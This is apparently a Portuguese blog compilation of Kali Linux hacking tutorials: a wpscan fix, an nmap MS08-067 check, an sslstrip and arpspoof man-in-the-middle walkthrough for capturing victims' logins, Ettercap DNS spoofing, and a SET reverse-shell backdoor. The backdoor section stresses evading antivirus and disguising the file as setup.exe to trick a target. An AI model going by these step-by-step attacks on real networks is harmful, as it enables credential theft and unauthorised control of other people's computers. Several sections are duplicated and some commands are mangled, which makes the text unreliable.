Tutorial: Usando o Maltego para o levantamento de informações
Resolvendo problema do wpscan pós-atualização do Kali Linux
Resolvendo problema do wpscan pós-atualização do Kali Linux
Após a atualização no meu Kali Linux, ao tentar utilizar a ferramenta wpscan, apareceu esse problema:
Após uma breve procura pelo google, eu achei a solução. Que é bem simples, basta você digitar esses comandos no seu terminal:
# apt-get install ruby1.9.1
# apt-get install ruby1.9.1-dev # apt-get install --reinstall gem
# gem install bundler
# apt-get install ruby1.9.1-dev # apt-get install --reinstall gem
# gem install bundler
# bundle install --gemfile=/usr/share/wpscan/Gemfile
# apt-get update
----------------------------------------------------------------------------------------------------
como usar o nmap para checar a existência da vulnerabilidade MS08-067, para quem não conhece essa vulnerabilidade pode ser explorada pelo Worm Conficker. Algumas ferramentas como Metasploit também podem ser usadas para explorar essa vulnerabilidade, basta usar o seguinte comando:
nmap --script smb-check-vulns.nse -p445 <host> (No de um host alvo apenas)
"nmap -PN -T4 -p139,445 -n -v --script=smb-check-vulns --script-args
safe=1 [target networks] (No caso de escanear todo um segmento de rede)"
A resposta será algo parecido com isso informando se o alvo é vulnerável ou não
Host script results:
| smb-check-vulns:
| MS08-067: NOT VULNERABLE
| Conficker: Likely CLEAN
| regsvc DoS: regsvc DoS: NOT VULNERABLE
| SMBv2 DoS (CVE-2009-3103): NOT VULNERABLE
| MS06-025: NO SERVICE (the Ras RPC service is inactive)
|_ MS07-029: NO SERVICE (the Dns Server RPC service is inactive)
Caso vc encontre uma máquina vulnerável vc pode explorer essa falha usando essa dica aqui
Usando sslstrip para capturar credenciais (MITM – Ethical Hacking)
Para realizar este ataque usei como “homem do meio” uma máquina com Kali Linux, uma distribuição Linux específica para pentest.
Caso precise de ajuda para instalação e configuração dessa ferramenta pode ver aqui
Para o meu teste tenho o seguinte cenário, para que você possa fazer o teste basta adaptar ao seu cenário.
IP da Vítima: 192.168.2.12
IP do default gateway 192.168.2.2
Vamos lá!
Usando o Kali Linux abra 4 terminais e deixe eles logados como “root” usando o comando “sudo su”. OBS: Creio que isso facilita para quem talvez não tenha muita experiência com linux, caso tenha experiência use os terminais como achar melhor.
Em um dos terminais digite o seguinte comando:
echo 1 > /proc/sys/net/ipv4/ip_forward (habilita o redirecionamento de pacotes)
No segundo terminal digite o seguinte o seguinte
iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 1000 (redireciona os pacotes da porta 80 para porta 1000 da máquina do atacante)
No terceiro terminal digite
arpspoof -i eth0 -t 192.168.2.12 192.168.2.2 (Lembre-se de adaptar de acordo com seu ambiente, esse comando vai “envenenar” a tabela arp da vítima fazendo com que ele mande todo trafego que ia para o gateway para o atacante)
No quarto terminal digite o seguinte:
sslstrip -l 1000 (vai ler todos os dados na porta 1000)
De volta no primeiro terminal digite o seguinte:
ettercap -Tq -i eth0 (Aqui é onde vamos ver o que queremos)
Após esse passo a “vítima” deve acessar algum site que seja necessário autenticação, gmail, hotmail, facebook, twitter, etc…
Se tudo foi feito corretamente você vai ter uma tela semelhante a essa.
Conforme pode se ver na imagem acima, marcado em vermelho, após a vítima fazer uma autenticação, será exibido o login e senha da pessoa.
Lembre-se que isso deve ser feito apenas em ambientes controlados ou com as devidas autorizações.
Caso precise de ajuda para instalação e configuração dessa ferramenta pode ver aqui
IP da Vítima: 192.168.2.12
IP do default gateway 192.168.2.2
Vamos lá!
Usando o Kali Linux abra 4 terminais e deixe eles logados como “root” usando o comando “sudo su”. OBS: Creio que isso facilita para quem talvez não tenha muita experiência com linux, caso tenha experiência use os terminais como achar melhor.
Em um dos terminais digite o seguinte comando:
echo 1 > /proc/sys/net/ipv4/ip_forward (habilita o redirecionamento de pacotes)
No segundo terminal digite o seguinte o seguinte
iptables -t nat -A PREROUTING -p tcp –dport 80 -j REDIRECT –to-port 1000 (redireciona os pacotes da porta 80 para porta 1000 da máquina do atacante)
No terceiro terminal digite
arpspoof -i eth0 -t 192.168.2.12 192.168.2.2 (Lembre-se de adaptar de acordo com seu ambiente, esse comando vai “envenenar” a tabela arp da vítima fazendo com que ele mande todo trafego que ia para o gateway para o atacante)
No quarto terminal digite o seguinte:
sslstrip -l 1000 (vai ler todos os dados na porta 1000)
De volta no primeiro terminal digite o seguinte:
ettercap -Tq -i eth0 (Aqui é onde vamos ver o que queremos)
Após esse passo a “vítima” deve acessar algum site que seja necessário autenticação, gmail, hotmail, facebook, twitter, etc…
Se tudo foi feito corretamente você vai ter uma tela semelhante a essa.
Conforme pode se ver na imagem acima, marcado em vermelho, após a vítima fazer uma autenticação, será exibido o login e senha da pessoa.
Lembre-se que isso deve ser feito apenas em ambientes controlados ou com as devidas autorizações.
Usando Kali linux para fazer um ataque de DNS Spoofing com Ettercap
Esse tipo de ataque é muito importante para conseguirmos algumas credenciais durante a execução de um PenTest. Ele consiste em enviar respostas falsas a requisições de DNS que forem feitas.
Para executarmos esse ataque a primeira coisa que queremos é editar o arquivo etter.dns, basicamente ele é como o arquivo hosts do windows e linux, nele podemos configurar para onde as solicitações serão enviadas.
Vamos lá, abra um terminal e digite
Para executarmos esse ataque a primeira coisa que queremos é editar o arquivo etter.dns, basicamente ele é como o arquivo hosts do windows e linux, nele podemos configurar para onde as solicitações serão enviadas.
Vamos lá, abra um terminal e digite
# vi /usr/share/ettercap/etter.dns

Podemos editar seguindo o padrão que pode ser visto na imagem acima, salve e saia e após digite ettercap -G que vai abrir o Ettercap em modo gráfico.
Vá em Sniff –> Unified Sniffing e quando solicitado escolha sua placa de rede eth0.
Agora vá em “Hosts” e clique em “Scan for hosts”
Vá novamente em “Hosts” Clique em Host List para
visualizar uma lista de todos IP’s disponíveis na rede, selecione qual
será a vítima que vai receber as respostas falsas e clique em Add to Target 1
Agora clique em Start –> Start Sniffing.
Após isso vá em MitM –> Arp Poisoning.
Selecione a opção Sniff remote connections conforme abaixo e clique em OK
Agora vá em Plugins –> Manage the Plugins e de um duplo clique em dns_spoof
Feito isso o cliente selecionado vai começar a receber respostas falsas de DNS.
Esse ataque é extremamente eficaz quando usado em conjunto com essa nossa dica aqui
Tutorial Kali Linux - Criando um backdoor para controlar PC’s remotamente
Criando um backdoor para controlar PC’s remotamente
Hoje mostrarei como usar o SET (social engineering
toolkit) disponível no Kali Linux para criarmos um backdoor que pode ser
utilizado para controlar remotamente computadores Windows. Vamos criar
um executável legítimo dificilmente detectado por algum antivírus, assim
temos completo a um computador alvo.
obs: todas as informações aqui devem ser usadas para fins
educacionais e que a invasão de dispositivos não autorizado é crime.
Vamos lá !
Em primeiro lugar vamos acessar o menu Applications/Kali Linux/Exploitation Tools/Social Engineering Toolkit e clique em se-toolkit. Vai ser exibido um menu como esse abaixo visto na imagem.
Neste menu de opções selecione a opção 1
Nesse segundo menu selecione a opção 4
Nessa tela abaixo você deve informar corretamente o seu endereço ip, caso tenha dúvidas abra um novo terminal e digite ifconfig eth0 daí preencha corretamente esse campo.
Na tela abaixo, você deve escolher a segunda opção para criarmos uma
conexão reversa, ou seja, a nosso computador alvo é quem fará a conexão
ao atacante.
Na tela abaixo atente aos 3 passos que devemos tomar, primeiro no
tipo de backdoor, digite o 16, na sequência devemos definir qual a
portal local, na máquina do atacante, que ficará “escutando” as
tentativas de conexão feitas pelo alvo, o padrão é a 443 daí é só
digitar Enter, caso queira mudar a porta se ela já estiver sendo usada
podemos digitar outro número e então dar enter, na sequência você é
questionado se quer iniciar a escuta daí vc deve digitar :yes
Feito isso o backdoor será criado e nosso computador alvo começará a escutar as tentativas de conexão das máquinas alvo.
O executável criado fica na pasta /usr/share/set e se chama msf.exe
Devemos tornar ele um executável daí podemos abrir um novo terminal e digitar o seguinte comando
chmod +x /usr/share/set/msf.exe
Caso queira vc pode renomear esse arquivo para facilitar o processo
de engenharia social, para convencer alguém a, por exemplo, instalar um
programa novo. Ex: setup.exe
Agora precisa copiar esse executável para a máquina alvo e assim que ele for executado vai aparecer uma tela como essa abaixo.
Aqui ao digitar o comando sessions podemos listar os alvos já conectados.
Ao digitarmos sessions -i 1 (supondo que 1 seja o
número da ID exibida através do comando sessions, caso outro número seja
exibido basta trocar o 1 pelo número mostrado) vamos
poder interagir com a máquina alvo tendo acesso completo a ela. Em breve
publicarei algumas dicas de comandos que podem ser usados para explorar
uma máquina alvo.
Espero que tenham gostado da dica e não esqueça de compartilhar. vlw!